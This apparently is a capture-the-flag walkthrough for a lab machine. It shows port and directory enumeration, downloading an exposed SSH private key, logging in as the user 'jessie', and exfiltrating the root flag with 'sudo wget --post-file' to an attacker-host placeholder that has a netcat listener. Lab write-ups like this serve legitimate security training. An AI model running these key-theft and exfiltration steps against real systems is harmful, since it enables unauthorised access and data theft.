Can you exfiltrate the root flag? Link to room is here .
![](https://miro.medium.com/max/2560/1*7FHa3DPcIRdhd-fWlpFBOg.jpeg)
Our challenge here is to find 2 flags. Let’s start with enumerating the ip
Use: nmap -sC -sV -A <machine_ip>
![](http://blog.ehackify.com/media/2021/06/Screenshot_10-2.png)
We can see that port 22 and port 80 are open.
Let’s go and check out what is there in the website since port 80 is open.
![](http://blog.ehackify.com/media/2021/06/Screenshot_12.png)
It’s a default page.But Let’s view the source of this page.Most of the time in a CTF’s some information will be hidden in the source code.
![](http://blog.ehackify.com/media/2021/06/Screenshot_1-2.png)
Looks like we got a user name,Let’s remember it for later.Let’s do a directory enumeration on the Website.
![](http://blog.ehackify.com/media/2021/06/1.png)
Let’s go to the /sitemap directory.
There is nothing interesting i could find there.Let’s enumerate this sitemap again.
Use: gobuster dir -u http://machine_IP/sitemap -x php,txt,html -w /user/share/wordlist/dirbuster/directory-list-2.33-medium.txt
![](http://blog.ehackify.com/media/2021/06/Screenshot_14.png)
We got something interesting here, Let’s go and checkout /.ssh
![](http://blog.ehackify.com/media/2021/06/Screenshot_13.png)
Let’s download that id_rsa file.
Use: wget http:Machine_ip/sitemap/.ssh/id_rsa
![](http://blog.ehackify.com/media/2021/06/Screenshot_3.png)
Give permission to the file.
Use:chmod 600 file_name
![](http://blog.ehackify.com/media/2021/06/Screenshot_4.png)
Let’s now use it to get a ssh connection to the machine.
Remember the user name we got from the source code? ->jessie
Use: ssh -i id_rsa jessie@machine_IP
![](http://blog.ehackify.com/media/2021/06/Screenshot_5-1.png)
Move around and find the user flag,we are inside the machine now.
![](http://blog.ehackify.com/media/2021/06/Screenshot_6-1.png)
Our next target is finding the root flag.Let’s try some old tricks to find what can sudo do here.
![](http://blog.ehackify.com/media/2021/06/Screenshot_7.png)
So we got where our flag is, we need to get it in our machine, we have 2 option here either we read it from the machine after a privilege escalation or we copy it to our machine and then read it. Let’s take the shortest path,let’s copy the file to our machine.
First open a netcat listener in our base machine.
![](http://blog.ehackify.com/media/2021/06/Screenshot_8.png)
In the target machine execute the below codes.
Use: sudo wget –post-file=/root/root_flag.txt attacker_machine_IP .
![](http://blog.ehackify.com/media/2021/06/Screenshot_15-1.png)
The flag will be copied to the attacker’s machine, just cat that file to get the root flag.
![](http://blog.ehackify.com/media/2021/06/Screenshot_9.png)
Peace out ✌️ ,Happy hacking.
Leave a Reply